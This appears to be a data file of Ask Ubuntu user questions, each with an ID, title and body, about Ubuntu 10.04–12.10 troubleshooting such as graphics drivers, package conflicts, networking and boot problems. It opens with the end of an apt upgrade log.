7 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . need to get 11.5mb of archives . after this operation , 0b of additional disk space will be used . do you want to continue [ y/n ] ? y get:1 http : //ubuntu-archive.sit.kmutt.ac.th/ lucid-updates/main libc-bin 2.11.1-0ubuntu7.12 [ 731kb ] get:2 http : //ubuntu-archive.sit.kmutt.ac.th/ lucid-updates/main libc6 2.11.1-0ubuntu7.12 [ 3,909kb ] get:3 http : //ubuntu-archive.sit.kmutt.ac.th/ lucid-updates/main libc6-i686 2.11.1-0ubuntu7.12 [ 1,240kb ] get:4 http : //ubuntu-archive.sit.kmutt.ac.th/ lucid-updates/main libc-dev-bin 2.11.1-0ubuntu7.12 [ 213kb ] get:5 http : //ubuntu-archive.sit.kmutt.ac.th/ lucid-updates/main libc6-dev 2.11.1-0ubuntu7.12 [ 4,891kb ] get:6 http : //ubuntu-archive.sit.kmutt.ac.th/ lucid-updates/main vim-tiny 2:7.2.330-1ubuntu3.1 [ 341kb ] get:7 http : //ubuntu-archive.sit.kmutt.ac.th/ lucid-updates/main vim-common 2:7.2.330-1ubuntu3.1 [ 174kb ] fetched 11.5mb in 15s ( 743kb/s ) preconfiguring packages ... ( reading database ... 240412 files and directories currently installed . ) preparing to replace libc-bin 2.11.1-0ubuntu7.11 ( using ... /libc-bin_2.11.1-0ubuntu7.12_i386.deb ) ... unpacking replacement libc-bin ... processing triggers for man-db ... setting up libc-bin ( 2.11.1-0ubuntu7.12 ) ... ( reading database ... 240412 files and directories currently installed . ) preparing to replace libc6 2.11.1-0ubuntu7.11 ( using ... /libc6_2.11.1-0ubuntu7.12_i386.deb ) ... unpacking replacement libc6 ... setting up libc6 ( 2.11.1-0ubuntu7.12 ) ... processing triggers for libc-bin ... ldconfig deferred processing now taking place ( reading database ... 240412 files and directories currently installed . ) preparing to replace libc6-i686 2.11.1-0ubuntu7.11 ( using ... /libc6-i686_2.11.1-0ubuntu7.12_i386.deb ) ... unpacking replacement libc6-i686 ... preparing to replace libc-dev-bin 2.11.1-0ubuntu7.11 ( using ... /libc-dev-bin_2.11.1-0ubuntu7.12_i386.deb ) ... unpacking replacement libc-dev-bin ... preparing to replace libc6-dev 2.11.1-0ubuntu7.11 ( using ... /libc6-dev_2.11.1-0ubuntu7.12_i386.deb ) ... unpacking replacement libc6-dev ... preparing to replace vim-tiny 2:7.2.330-1ubuntu3 ( using ... /vim-tiny_2 % 3a7.2.330-1ubuntu3.1_i386.deb ) ... unpacking replacement vim-tiny ... preparing to replace vim-common 2:7.2.330-1ubuntu3 ( using ... /vim-common_2 % 3a7.2.330-1ubuntu3.1_i386.deb ) ... unpacking replacement vim-common ... processing triggers for man-db ... setting up libc6-i686 ( 2.11.1-0ubuntu7.12 ) ... setting up libc-dev-bin ( 2.11.1-0ubuntu7.12 ) ... setting up libc6-dev ( 2.11.1-0ubuntu7.12 ) ... setting up vim-common ( 2:7.2.330-1ubuntu3.1 ) ... setting up vim-tiny ( 2:7.2.330-1ubuntu3.1 ) ... processing triggers for libc-bin ... ldconfig deferred processing now taking place wijit @ aeh : ~ $ sorry for late response . this old pc is at my home . here is dpkg 's results : wijit @ aeh : ~ $ dpkg -l | grep linux-image rc linux-image-2.6.32-40-generic 2.6.32-40.87 linux kernel image for version 2.6.32 on x86 rc linux-image-2.6.32-41-generic 2.6.32-41.94 linux kernel image for version 2.6.32 on x86 ii linux-image-2.6.32-42-generic 2.6.32-42.96 linux kernel image for version 2.6.32 on x86 wijit @ aeh : ~ $
222809	safari style animations	anybody know if it 's possible to get mac book style animations on ubuntu ? specifically the back , forward , and exit tab animations .
222810	nexus 7 installer gets stuck on 'erasing boot partition ''	i have the 32 gig version . i get as far as 'erasing boot partition ' , at about 15-20 % then it just hangs .
222811	when will fglrx be fully supported by ubuntu 12.10 ?	the title pretty much speaks for itself . i want to know when i will be able to install fglrx from the ubuntu repositories and for it to work correctly ? it seems to work fine on 12.04 but not 12.10 yet .
222816	ubuntu 12.10 not properply working on asus u46e after update	i recently installed the latest ubuntu update on my laptop and since then , the alignment on the browser is messed up , the mouse is not working , and i ca n't connect to the internet . before it was working perfectly . any ideas on what to do ? thanks for any feedback fyi : i am right now using windows since i have both linux and windows on my laptop . also , when booting i do have the option to boot previous ubuntu versions , when i boot the previous unbuntu version on my laptop , everything works accept except the internet . ( the mouse works , alignment is proper )
222823	how to get or configure ip-mib in ubuntu 12.04 ?	i am using snmp and trying to get with snmpwalk -v 2c -c public x.x.x.x ipadd where x.x.x.x is the ip of the pc with ubuntu 12.04 i get this answer : ip-mib : :ipaddrtable = no such object available on this agent at this oid so how can i get the ip addres from a ubuntu 12.04 lt pc , there is maybe another comand that i can use ? thanks for the answer .
222825	creating thumbnails with the same name as the pictures	please , here is my little code for creating thumbnails of pictures saved in a folder named 'pictures ' , and saving them in another folder named 'thumbs ' . # ! /bin/bash for i in *.jpg do convert -thumbnail 100 $ i thumbs/ $ i done however , there two things the program does n't do : 1 ) it does not retain the name of the pictures in the thumbnail . for instance , i would want it to generate a thumbnail with the name pic.jpg for a picture named pic.jpg 2 ) also , when i run the program , i do n't want it to generate the thumbnail for a picture it has already generated its thumbnail , unless that picture has been modified . any help will be very much appreciated . thank you
222829	( solved ) error : packet source 'wlan0 ' failed to set channel 2 : mac80211_setchannel ( ) in kismet and ubuntu 12.10	i have installed ubuntu 12.10 in my computer with an atheros ar5007 wireless card . i want to use kismet but when i run it it starts displaying the message : error : packet source 'wlan0 ' failed to set channel x : mac80211_setchannel ( ) it keeps displaying the same for every channel except channel 1 . i have installed the compat-wireless-3.6.6-1 drivers and patched them with the following patch in order to use them with aircrack-ng . i have installed the latest version of kismet in the git repository and i even tried with the svn but it keeps displaying the same error . i also have set the kismet.conf file with the nsource=wlan0 as it is the name of my wireless interface according to iwconfig : lo no wireless extensions . wlan0 ieee 802.11bg essid : '' xxxx '' mode : managed frequency:2.412 ghz access point : xx : xx : xx : xx : xx : xx bit rate=18 mb/s tx-power=20 dbm retry long limit:7 rts thr : off fragment thr : off power management : off link quality=28/70 signal level=-82 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:282 missed beacon:0 i have n't found any answer since similar errors are supposed to be fixed with the latest kismet release but this is n't my case . any help will be appreciated . thank you !
222835	echo c | sudo tee /proc/sysrq-trigger does n't work	i 'm studying the server guide from ubuntu and i ca n't resolve this trouble . i follow this steps : sudo -s [ sudo ] password for ubuntu : # echo c > /proc/sysrq-trigger [ 31.659002 ] sysrq : trigger a crash [ 31.659749 ] bug : unable to handle kernel null pointer dereference at ( null ) [ 31.662668 ] ip : [ < ffffffff8139f166 > ] sysrq_handle_crash+0x16/0x20 [ 31.662668 ] pgd 3bfb9067 pud 368a7067 pmd 0 [ 31.662668 ] oops : 0002 [ # 1 ] smp [ 31.662668 ] cpu 1 i did sudo sysctl -w kernel.sysrq=1 too but the screen stay freeze and do n't reboot the system . a reboot the system manually but after up the system a command ls /var/crash and there is nothing . can you help me ? thanks a million !
222843	sreeensaver timeout for 12.04 sever cli	i have installed 12.04lts server edition , no gui . at some interval , maybe 5 minutes the screen will blank and i have to hit a key to show the screen again . i have spent hours surfing but can not find how to change the interval . my question is where do i modify the timeout parameter ( through terminal ) and where should i have looked for the answer ? there is plenty of advice out there for the gui version but none i could find for the cli version
222845	how do i find out what app just connected to internet ?	how do i tell the ubuntu to report what app connected to the internet ? i am learning of cli programs that report connections but an app connected to the internet and the description of it disappeared from the terminal window before i had a chance to examine it . i looked at the firewall log but it say nothing about what apps are connecting to the internet . so how do i learn what app connected to the internet in the last 10 minutes or so ? why is there no log report of what apps are connecting to internet ? how do i get this ?
222846	xlib : extension “glx” missing on display “:0.0” . error : could n't find rgb glx visual or fbconfig	i 'm really confused and lost . i 'm a completely new ubuntu 12.04 lts user and i 'm trying to run a game on wine and opengl . i was instructed to use the glxinfo command on my terminal to see if i had opengl and this turned out : glxinfo name of display : :0.0 xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . error : could n't find rgb glx visual or fbconfig xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . i have installed mesa-utils , and i 've run some nvidia-current commands or something to install my graphics card . i 'm currently running an asus a45v , nvidia geforce 610m , ubuntu 12.04lts .
222853	if im using nouveau there is no way to use vdpau with it ?	im using ubuntu 12.10 and im using the opensource driver which came reloaded with the distro tried to install the proper driver but i failed , so now im using the opensource driver and its okay , but the only problem is i want to use vdpau coz it accelerate the videos on youtube and smplayer and play it with less cpu usage . my question is : is there a way to enable vdpau with the opensource driver or do i have to use the proper driver from nvidia ?
222854	screen brightness control not working on lenovo t530	my brightness control does n't work with a fresh install of 12.10 ( brand new laptop ) . it is set to the brightest setting when i boot up and when i try to change it , i see the notification bar come up but the brightness does n't actually change . i 've tried all the solutions i could find around the internet but none of them work . things i have tried include : editing /sys/class/backlight/acpi_video0/brightness in /usr/share/x11/xorg.conf.d/10-brightness-control.conf : option `` registrydwords '' `` enablebrightnesscontrol=1 '' in /etc/default/grub : grub_cmdline_linux_default= '' quiet splash acpi_osi=linux acpi_backlight=vendor '' there is no xorg.conf file in 12.10 that i have found , so the solutions that suggest editing that file do n't do me a whole lot of good . i am currently using the nouveau driver , but switching to the nvidia proprietary drivers made no difference . any other ideas ? when is this bug going to be fixed ? with all the reports i 've come across i would think it would get a lot of attention . thanks .
222856	unity does not load when selecting xorg open source radeon driver	when i select the x.org radeon open source driver , unity does not load . however , when i select the proprietary amd driver from the official ubuntu repository , unity does load . why is unity doing this ? i had no problems with switching between these drivers in ubuntu 12.04 lts . this started happening when i upgraded to ubuntu 12.10 . before i ever installed the propriatery amd driver , the x.org driver loaded unity fine , but very sluggishly . i downloaded the amd driver from their official website and installed that first and that is what started this problem . i removed that driver and went back to x.org and x.org did n't load unity either . then using synaptic , i installed the amd driver from the ubuntu repositories and thats what i 'm using now . i 'm very confused why that downloaded amd driver would effect x.org . i have a amd radeon hd 6620g . it 's integrated graphics on my amd a8-3500m fusion apu ( accelerated processing unit as amd advertises it ) . here is a wikipedia article on my a8 fusion apu here .
222859	ca n't login after forced shutdown	i am on ubuntu 12.04 and forced a shutdown ( hardware switch ) . now i ca n't login anymore . in particular , after entering my password i get sent back to the login screen . the error message is to fast for me to read . i am , however , able to login into the guest account through the usual login screen , and able to login into my own account on tty1 after pressing ctrl+alt+f1 . what should i try to get back into my own account via the login screen and get back to a working desktop ? update : i can login with gdm , but not with the ( default ) lightdm . so the forced shutdown seems to have broken lightdm . the question now is , how do i fix a broken lightdm ?
222862	problem installing java using software center and terminal	i am new at ubuntu 12.04 lts . i need to install java 6 or 7 . but , when i want to do it using the software center or by terminal it responds me `` install failed '' and `` check your internet connection '' . but , i can easily install other software using software center and terminal and there is no problem in my internet connection . what should i do now ? how can i install java on ubuntu ?
222869	error when running gtk-redshift	i 'm getting this error when i run gtk-redshift from the cli ( it just does n't start if i start it from the gui ) : ( process:3862 ) : glib-gobject-critical ** : g_type_instance_get_private : assertion `instance ! = null & & instance- > g_class ! = null ' failed if i run redshift , i also get the same error as above , followed by this : segmentation fault ( core dumped ) i 'm running redshift version 1.7 and xubuntu 12.10 .
222870	how to install neatx-server on ubuntu 12.10 ?	after try : sudo apt-get install python-software-properties & & sudo add-apt-repository ppa : freenx-team sudo add-apt-repository ppa : nathan-renniewaldock/ppa & & sudo add-apt-repository ppa : freenx-team < br > sudo add-apt-repository ppa : freenx-team none can let the sudo apt-get update to be succeed . not to mention sudo apt-get install neatx-server . ( found no neatx-server ) is there a solution for that ? thanks~
222873	libreoffice - ca n't drag and replace images [ libreoffice 3.5 and 3.6 , ubuntu 12.04 ]	my wife uses libreoffice to create catalogues of a couple hundred items and then converts it to pdf . man we love libreoffice ! anyway i set up windows-7 and mint-14-mate dual boot for her to ease into linux . today she was ready for ubuntu and so i did a clean install on her machine . everything was smooth but today when she tried to work she ran into an issue ... she used to be able to download a folder full of images to use in her catalogues and then update her catalogues by replacing old images with new ones . it was so simple - open an old catalogue , save with a new date , drag and drop replace images of items that no longer exist . the drag and drop process would scale the image and then crop it horizontally or vertically to fit . now that i have installed ubuntu 12.04 for her she can no longer replace images , it just does nothing ... if she drags the image to the left or right of the original it appears next to the original so i know d & d works , unfortunately it does not resize or crop the image . i tried this on my laptop and my desktop ... same thing ! i then tried updating the libreoffice to 3.6 , no change . i then tried opening a virtual machine windows xp and mint 14 on this computer and tried with 3.6 in those operating systems and it worked . can anyone help ? i have a lot of hope that there is an answer because mint is based on ubuntu/debian and that distro can perform this task successfully ! sorry about writing a book ... .
222876	apache2 rewrite without htaccess	reading up on doing url rewrites in apache2 , i found this : '' in general , you should never use .htaccess files unless you do n't have access to the main server configuration file . okay , great . but there is no information anywhere about how to do it in the server configuration file . so before i mess stuff up , can i safely use the same rewrite directives , like < ifmodule mod_rewrite.c > options +followsymlinks rewriteengine on rewritecond % { script_filename } ! -d rewritecond % { script_filename } ! -f rewriterule ^test/ ( \w+ ) $ test.php ? n= $ 1 [ l ] < /ifmodule > in /etc/apache2/apache2.conf ? /etc/apache2/httpd.conf is blank , but i suppose i could do it there too ? another question , should the rewrite rule paths be prefixed with /var/www/ or can i do it relative to the site root ? thanks .
222884	nautilus suddenly looks different after a restart	nautilus now looks different , and i do n't like it . before i restarted , i installed a few things , so that could of caused it . ( the buttons are outlined and my icon pack is n't working for the 16x icons on the sidebar panel , but the address bar should look like that because i am using tweak tool to make it look like that ) if it matters , i 'm using gnome 3 desktop environment .
222886	will ubuntu remove vnc in favor of freenx ?	i haved tried out some of the remote control options and to me vnc feels old and slow . is there any chance ubuntu will work with nx server and bundle freenx and completely remove vnc as a core product . because it installs standard it gives the suggestion of being a relevant product but as most people replace it , i do n't think it merits inclusion in the base install . unless it 's predetermined that android will be replacing gnome and unity , fixing this remote tools issue seems like time well spent . increases usability and exstends the os family . phone , tablet , laptop , workstation , server .
222888	network is disabled	i could successfully connect to network through livecd but through my hard disk it is not possible . : ~ $ sudo ifup eth0 ifup : interface eth0 already configured : ~ $ sudo lshw -class network *-network disabled description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth0 version : 05 serial : ff : ff : ff : ff : ff : ff size : 100mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full latency=0 link=no multicast=yes port=mii speed=100mbit/s resources : irq:40 ioport : e000 ( size=256 ) memory : f0004000-f0004fff memory : f0000000-f0003fff : ~ $ sudo /etc/init.d/networking restart * running /etc/init.d/networking restart is deprecated because it may not enable again some interfaces * reconfiguring network interfaces ... rtnetlink answers : no such process siocsifflags : can not assign requested address siocsifflags : can not assign requested address rtnetlink answers : network is down run-parts : /etc/network/if-up.d/avahi-autoipd exited with return code 2 [ ok ] please let me know if you need more information .
222891	how to kill a java process which is configured in /etc/init.d using normal user via batch file	i have a script which is located in /etc/init.d to run a jar program . i need a batch file to kill this jar program after login , is there anyone know how to do it ?
222893	package manager broken and libjack errors after using bleedingedge12_4_26.sh	i recently installed ubuntu 12.04 lts . i used the bleedingedge12_4_26.sh script which was recommended to me to install some more software . this morning my update notification came up and when i tried to do an update i started getting errors about the package manager being broken . the package manager log revealed that libjack was the problem . i tried to install it manually but this is what i get : $ sudo apt-get install libjack-jackd2-0 [ sudo ] password for jls : reading package lists ... done building dependency tree reading state information ... done suggested packages : jackd2 the following packages will be upgraded : libjack-jackd2-0 1 upgraded , 0 newly installed , 0 to remove and 8 not upgraded . 1 not fully installed or removed . need to get 0 b/197 kb of archives . after this operation , 3 072 b of additional disk space will be used . ( reading database ... 207517 files and directories currently installed . ) preparing to replace libjack-jackd2-0 1.9.8~dfsg.1-1ubuntu1 ( using ... /libjack-jackd2-0_1.9.8~dfsg.2-1precise1_amd64.deb ) ... unpacking replacement libjack-jackd2-0 ... dpkg : error processing /var/cache/apt/archives/libjack- jackd2-0_1.9.8~dfsg.2-1precise1_amd64.deb ( -- unpack ) : './usr/share/doc/libjack-jackd2-0/buildinfo.gz ' is different from the same file on the system dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/libjack-jackd2-0_1.9.8~dfsg.2-1precise1_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) it seems like some kind of conflict but i am unable to decipher exactly what . any help would be much appreciated . thanks update : after some more research i tried this : $ sudo apt-get clean $ sudo apt-get update & & sudo apt-get upgrade which returned this : fetched 2 574 kb in 17s ( 144 kb/s ) reading package lists ... done reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : libjack-jackd2-0 : breaks : libjack-jackd2-0 : i386 ( ! = 1.9.8~dfsg.1-1ubuntu1 ) but 1.9.8~dfsg.2-1precise1 is installed libjack-jackd2-0 : i386 : breaks : libjack-jackd2-0 ( ! = 1.9.8~dfsg.2-1precise1 ) but 1.9.8~dfsg.1-1ubuntu1 is installed e : unmet dependencies . try using -f. so i tried this : $ sudo apt-get -f install which returned this : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : libjack-jackd2-0 suggested packages : jackd2 the following packages will be upgraded : libjack-jackd2-0 1 upgraded , 0 newly installed , 0 to remove and 22 not upgraded . 1 not fully installed or removed . need to get 197 kb of archives . after this operation , 3 072 b of additional disk space will be used . do you want to continue [ y/n ] ? y get:1 http : //ppa.launchpad.net/dns/sound/ubuntu/ precise/main libjack-jackd2-0 amd64 1.9.8~dfsg.2-1precise1 [ 197 kb ] fetched 197 kb in 1s ( 101 kb/s ) ( reading database ... 207517 files and directories currently installed . ) preparing to replace libjack-jackd2-0 1.9.8~dfsg.1-1ubuntu1 ( using ... /libjack-jackd2-0_1.9.8~dfsg.2-1precise1_amd64.deb ) ... unpacking replacement libjack-jackd2-0 ... dpkg : error processing /var/cache/apt/archives/libjack-jackd2-0_1.9.8~dfsg.2-1precise1_amd64.deb ( -- unpack ) : './usr/share/doc/libjack-jackd2-0/buildinfo.gz ' is different from the same file on the system dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/libjack-jackd2-0_1.9.8~dfsg.2-1precise1_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) jls @ jls-hp-pavilion-g6-notebook-pc : ~ $ sudo dpkg -- configure -a dpkg : error processing libjack-jackd2-0 : i386 ( -- configure ) : libjack-jackd2-0 : i386 1.9.8~dfsg.2-1precise1 can not be configured because libjack- jackd2-0 : amd64 is in a different version ( 1.9.8~dfsg.1-1ubuntu1 ) errors were encountered while processing : libjack-jackd2-0 : i386 so i tried to remove the conflicting package ; $ sudo apt-get remove -- purge libjack-jackd2-0 and ended up with this ; reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : gstreamer0.10-plugins-good : depends : libjack-jackd2-0 ( > = 1.9.5~dfsg-14 ) but it is not going to be installed or libjack-0.116 libasound2-plugins : depends : libjack-jackd2-0 ( > = 1.9.5~dfsg-14 ) but it is not going to be installed or libjack-0.116 libavdevice53 : depends : libjack-jackd2-0 ( > = 1.9.5~dfsg-14 ) but it is not going to be installed or libjack-0.116 libfluidsynth1 : depends : libjack-jackd2-0 ( > = 1.9.5~dfsg-14 ) but it is not going to be installed or libjack-0.116 libmlt4 : depends : libjack-jackd2-0 ( > = 1.9.5~dfsg-14 ) but it is not going to be installed or libjack-0.116 libportaudio2 : depends : libjack-jackd2-0 ( > = 1.9.5~dfsg-14 ) but it is not going to be installed or libjack-0.116 librtaudio4 : depends : libjack-jackd2-0 ( > = 1.9.5~dfsg-14 ) but it is not going to be installed or libjack-0.116 librtmidi1 : depends : libjack-jackd2-0 ( > = 1.9.5~dfsg-14 ) but it is not going to be installed or libjack-0.116 lmms : depends : libjack-jackd2-0 ( > = 1.9.5~dfsg-14 ) but it is not going to be installed or libjack-0.116 e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . and now i 'm really stumped : (
222903	hang when searching for string	i am using ubuntu12.04 now . in this default search functionality is hang in editors like gedit and libreoffice writer ( default office ) etc applications for 10-20 second when we do continous search in a file 4-5 times . this issue was not present in ealier version of ubuntu in same applications . so is it problem in ubuntu12.04 or anything else ? please confirm . thanks in advance .
222905	offline m2cypto package installation	i am installing a server on ubuntu 10.4 ( internet not connected ) .it requires a package named m2crypto.there is no open port available so iam not able to use `` apt-get thing '' .i tried to download m2crypto package on another machine ( windows ) but when i tried to install that multiple dependencied were reported.so , i need a way to get all packages with all dependencies.i have heard about apt -get offline but that is also not available .is there any way as i need to do this urgently .
222906	is there a graphical pager with syntax highlighting ?	is there a graphical application in the repositories which has keyboard controls like the command-line application `` less '' and also has syntax highlighting ? i would like it to have arrow keys that scroll the page instead of the cursor , and so there is no need for line wrapping i would like it to scroll the page sideways too .
222908	why thunderbird is taking too much space	this is the second time happening with me . last time i got suggestion from a friend on same forum to use disk usage analyzer to check whats consuming too space . i found out that its thunderbird . same thing happening again on daily basis it is consuming more that 4gb of space i have 100gb of total space and on this rate i 'll be out of space in 1 week . more than that when i send some email its takes much time in copying the space on local repository and gmail account . maximum size of email which i send is 22 to 30kb which is just text .
222911	while installing remastersys-gui_3.0.3-1_amd64.deb following error occured	e : /var/cache/apt/archives/remastersys-gui_3.0.3-1_amd64.deb : trying to overwrite '/usr/bin/plymouth-preview ' , which is also in package remastersys-gtk 3.0.3-1 please provide me with the solution
222913	upgrade from 11.04 to 12.04 lts	my ubuntu 11.04 installation refuses to perform updates for the past month . i decided to upgrade to 12.04 lts . i have a separate partition for /home . how can i upgrade without losing my programs and data ? the update manager does not show anything as possible upgrade .
222914	undelete files on ext4 with folder structure and everything	i 've accidentally removed all my home directory ( do n't judge ! ) . my early search results led me to applications like extundelete and photorec . but the results were not acceptable . extundelete exits unexpectedly ( without doing anything ) and photorec recovers files in a flat structure . i wonder if there 's an application which recovers files and folders together . my lost archive is consisted of thousands of files which are worthless if they are not structured in the original folders !
222916	using samsung syncmaster c27a750x wireless usb ?	i 'd like to know if there is any chance to use the wireless usb dongle of the samsung syncmaster c27a750x or c27b750x with my ubuntu notebook ? the screen provides the feature that it can be used as a docking station - everything ( usb devices and the output of the screen ) is transferred via wireles usb - the question is : does it work on a ubuntu notebook ?
222917	ubuntu keeps disconnecting my network	i have an issue with my ubuntu network ; the problem is : i am connected to a proxy-based network , using authentication . after a while it automaticly disconnects , and then , it tries to connect again , and says `` connection established '' . sometimes , it asks me to re-enter the proxy auth . details again , and it reconnnects . pretty annoying , and i hope it can be fixed somehow . this happens only on the proxy network , and doesnt happen at home at all . need any details ? let me know , and lets get this fixed ! ^^
222921	buy the server contents	how i can buy the contents of the server of archive.ubuntu.com ( for lucid lynx ) ? in my country i have ultra slow connection . it will take years for downloading all these gigabytes . because , canonical will stop supporting ubuntu 10.04 , i want all the files now , before it 's too late . i know that all files will be transfer to old.dir but i think some will be lost . and anyway i want the files . my question is : can canonical provide ( with payment ) a disk with the contents of the server ? cheers
222926	dropbox is not up when i login remotely via ssh	i have a computer with ubuntu12.04 and dropbox . when i login it remotely via ssh , i find that dropbox 's daemon wo n't be called up . how to solve this problem , please ?
222927	am i using gnome 3 ?	i 'm using ubuntu 12.10 with gnome-classic instead of unity . what i have is an `` applications , places , ... '' bar on the top and a taskbar on the bottom . now , correct me if i 'm wrong , but that looks like a gnome 2 interface to me . as far as i 've seen on the gnome site , gnome 3 looks quite a bit different ( icon bar on the left , contact list on the bottom , etc ) . so i figured i had somehow gotten gnome 2 . but a check says it 's gnome 3 : $ gnome-session -- version gnome-session 3.6.0 so which one is it ? : )
222930	lubuntu menus appear in second language , not the default language	using lubuntu 12.04 i have set the default language to english ( uk ) and have also installed english ( us ) and korean in that order . i have clicked the 'apply system wide ' button but some menus still appear in korean . some appear in korean with some english . the desktop is in american english . this seems to be a bug . i can only change the menus by removing korean altogether . any ideas ? thank you
222931	screen blank ( 'no signal ' ) after choice `` try ubuntu ''	i made a live cd and booted it up and chose to `` try ubuntu '' . some stuff happened and now my screen is just blank and my monitor says no signal . whats happening ? is it installing or what ? its been like this for about 10-15 minutes .
222932	create a program in c/c++ which would open /etc/default/grub file and allow me to edit it	hi i have installed g++ in my ubuntu . i want to create a program in c which would allow me to open /etc/default/grub file and edit it in such a way that when i switch on my pc it would first display my name and the start ubuntu . the c program will only allow me to make necessary changes to /etc/default/grub file . then i will manually update my grub by using sudo update-grub command . after this when i switch on my pc it will first show my name then start ubuntu . can this be done . plz help..
222935	problems with amd driver for ati radeon hd 3870	for some reason after installing the drivers for the video card ati radeon hd 3870 , start lags . slows scrolling , sometimes flash player and games . i 'm tired . at first it was all in 12.04 , and recently installed 10.04 and the same thing happens . help , please . maybe it 's not the drivers , but in the ubuntu or compiz ? 10.04 32-bit ( kernel 2.6.32-45 ) amd athlon 64 x2 5200+ ati radeon hd 3870 1 gb ram
222938	how do i reset proxy in terminal to automatic if not connected via proxy	i tried to reset proxy of the terminal by some commands but it does n't happen and automatically switches back to this proxy 172.16.0.16 ( which apparently was my college proxy ) . i checked in my system settings.i do n't understand why this is recurring . please be comprehensive.also i further would like to know how to bypass proxy server since i could n't access any of the ubuntu repositories as they were blocked in my college 's proxy settings as is ubuntu 's homepage . thanks for your time . for sudo ls /etc/apt/apt.conf.d/ it displays a different set of options where proxy is not listed.i am on 12.10 , if this should help any.i put a snap of the terminal after the above command has been entered .
222951	is there a way to load dconf settings based on ldap group ?	i am looking for a way to replace ms ad . so i came across this document that kinda does it : https : //help.ubuntu.com/community/singlesignon # login_manager_configuration but i would like to further lock down user desktops like it is described in this post : https : //wiki.ubuntu.com/specification/configurationlockdown how can i apply dconf profiles per ldap group ? -is it possible to store them on a network share ? how can i apply locks per ldap group ? -do i need to push them to `` /etc/dconf/db/'database'.d/locks '' or can i have locks on a network share ? how does dconf handle profile/lock updates ? is there a best practice document that could help me ? thanks
222954	when does mysql server start when my system starts up ?	i installed mysql using apt-get ... , and when i press the power button , while my system boot up , mysql starts automatically . but i want to know what 's the time it starts exactly , and through which script the mysqld is invoked ?
222955	why sound disappears when i plug headphone jack ?	in my sound preferences i have two outputs : headphones and speakers . when i plug headphone jack , it switches to headphones and back to speakers on unplug . but if i manually switch output to speakers , signal on headphone jack appears immediately . that is it is the same output in hardware level . i think , i need to reconfigure by hands any sound subsystem or something else , but do n't know exactly what . do n't sure this is bug , but a little part of quest named ubuntu . it happened fatter my upgrade from 10.04 to 12.04 . thanks .
222959	move ubuntu server virtual machine from linux to windows	i 've created a virtual machine under xubuntu linux 12.10 x86_64 and installed ubuntu server 12.10 x86_64 on it , then i configured it for my use case - no problems here , everything works great . later on , i terminated the machine and copied the virtual disk image ( vdi-file ) to my windows 7 ( 64-bit ) machine , then i re-created the virtual machine and attached image file to it . but when i try to boot it , i ca n't get past the grub menu - i see just a black window and nothing is happening . how can i launch this machine on windows host ? or how can i at least investigate the situation ?
222960	no alternative drivers appearing on software sources and manual install leads to no unity	i just got a new laptop , installed ubuntu 12.10 and am trying to install proprietary nvidia drivers . once i understood the change from jockey , i did a fresh install and followed these instructions : http : //techhamlet.com/2012/11/install-nvidia-drivers-in-ubuntu-12-10/ but when i do , unity crashes on startup . my hardware on lspci | grep vga is as follows 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) 01:00.0 vga compatible controller : nvidia corporation gk107 [ geforce gt 650m ] ( rev a1 ) i 've followed a couple of nvidia 12.10 tutorials on google but none have helped . can i get any specific advice ?
222962	wine 1.5 % programfiles % error	i 'm trying to install d3dx9 with winetricks on wine 1.5 from ppa and i keep getting an error . i tried : winearch=win32 wineprefix=~/.win32 winecfg sudo winearch=win32 wineprefix=~/.win32 winetricks and still get this error : wine cmd.exe /c echo ' % programfiles % ' returned empty string if i type wine cmd.exe /c echo ' % programfiles % ' into the terminal i get c : \program files so the path seems correct but not when i run winetricks . i also tried this regedit fix with no luck . any ideas ?
222963	how to create a makefile with a shell script	i have a shell script , and would like to convert it to a makefile so that it can be executed with the command 'make all ' . how would i go about this ? thanks
222964	can not boot from ubuntu live cd on preinstalled windows 8 laptop	i bought a sony vaio with windows 8 yesterday . i want to install ubuntu , ( latest version ) , alongside windows . there is an assist button on the laptop to enter the boot option menu , ( otherwise , windows 8 is booted by default . whenever i choose the , 'boot from cd ' option , it says 'no operating system found ' . cd is valid since i tried it on another computer and it worked fine . i have tried both versions , 12.04 and 12.10 . what is the problem , or how should i install ubuntu on my laptop ?
222967	ethernet dongle not working on a lenovo thinkpad x1 carbon	i have recently bought a thinkpad x1 carbon , installed ubuntu 12.10 and everything i need works like a charm - except for the ethernet usb dongle . searching google has n't brought up any solutions or even suggestions , so i 'm wondering if i 'm the only one experiencing this issue ?
